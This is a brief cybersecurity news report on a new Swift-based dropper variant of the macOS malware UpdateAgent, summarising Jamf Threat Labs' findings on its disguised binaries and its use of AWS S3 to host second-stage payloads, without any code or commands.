UpdateAgent Returns with New macOS Malware Dropper Written in Swift

Cyber Security

Products You May Like

A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities.

“Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server,” researchers from Jamf Threat Labs said in a report.

UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.

The newly discovered Swift-based dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.

CyberSecurity

“The primary difference [between the two executables] is that it reaches out to a different URL from which it should load a bash script,” the researchers noted.

These bash scripts, named “activedirec.sh” or “bash_qolveevgclr.sh“, include a URL pointing to Amazon S3 buckets to download and run a second-stage disk image (DMG) file to the compromised endpoint.

“The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible,” the researchers said.

Products You May Like

Articles You May Like

Boat Smartwatches in India Get Tap and Pay Functionality in Collaboration With Mastercard
Reliance Announces JioTV OS With Hello Jio AI Assistant, JioHome App, JioTV+, JioPhonecall AI, and More
Human Brains Can Resist Decay for Up to 12,000 Years, Reveals Study
Realme 13 5G, Realme 13+ 5G With 80W Fast Charging Launched in India: Price, Offers, Specifications
Atlassian Confluence Vulnerability Exploited in Crypto Mining Campaigns

Leave a Reply

Your email address will not be published. Required fields are marked *